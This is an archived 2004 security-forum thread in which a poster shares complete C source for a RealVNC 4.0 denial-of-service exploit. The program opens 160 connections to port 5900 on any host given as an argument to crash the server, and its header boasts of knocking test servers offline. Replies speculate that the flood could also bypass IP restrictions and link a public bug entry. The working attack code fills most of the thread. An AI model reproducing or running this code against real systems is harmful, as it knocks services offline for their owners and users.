hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > General Network Security
101
Aug 30 2004, 09:10 PM
Do you believe this app crash after 80-90 connections on it ?


Bug's discussion at Insecure.org

CODE

/****************************************************************************
*                                                                          *
*               RealVNC 4.0 remote ddos Exploit                            *
*                                                                          *
*  This is a stupid bug and stupid exploit. and this toy for kiddies       *
* Tested agains Windows XP,2000 and 98. it works well and the test servers *
* are down with an ADSL Router heheh :p    have fun..                      *
* Anyway what can i say more...                                            *
* Gr33t1ngz: N4rK07IX, blueStar, L4M3R.                                    *
*                                                                          *
*                            Code by Uz4yh4N <Lord@Linuxmail.org>          *
*                                                                          *
****************************************************************************/



#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

#define PORT 5900
#define TIMES 160  

main(int argc, char *argv[])
{
   int sockfd[TIMES+5],i;
   struct hostent *he;
   struct sockaddr_in servaddr;

     

   if(argc != 2) {
     fprintf(stdout, "\n Usage: %s hostname/ip \n\n",argv[0]);
     exit(-1);
   }
   if ((he=gethostbyname(argv[1])) == NULL) {
           perror("gethostbyname");
           exit(-1);
       }

   for(i=0;i<TIMES;++i) {

     if((sockfd[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
           exit(-1);
     }
   }
 
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(PORT);
servaddr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(servaddr.sin_zero), '\0', 8);

fprintf(stderr, "[+] Trying...\n");

 for(i=0;i<TIMES;++i) {

   if(connect(sockfd[i], (struct sockaddr *)&servaddr, sizeof(struct sockaddr)) == -1) {
  fprintf(stderr, "[+] The target must be down..\n");
  goto done;
}
   
}

done:
 for(i=i;i>0;i--)
   close(sockfd[i]);

 fprintf(stdout, "[+] Done..\n");

 return 0;

}


DiabloPatch
Aug 30 2004, 09:24 PM
hmmm well doesn't look like much but

if it crashes after a certain amount of connections.

then if the vnc has ip restrictions it could be maybe possible that that check on ip starts malfunctioning after certain amount of connections before crashing. Allowing connections from arbitrary hosts. Havn't tested this yet just a theorie.
101
Sep 3 2004, 01:35 PM
slow asses at SecurityFocus , they publish it 4 days later hehe

http://www.securityfocus.com/bid/11048/

nb: Idle in my channel to see all sec. news in real time wink.gif
Macsou
Sep 3 2004, 03:34 PM
Yeah .... Stupid exploit . Stupid real vnc ....
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.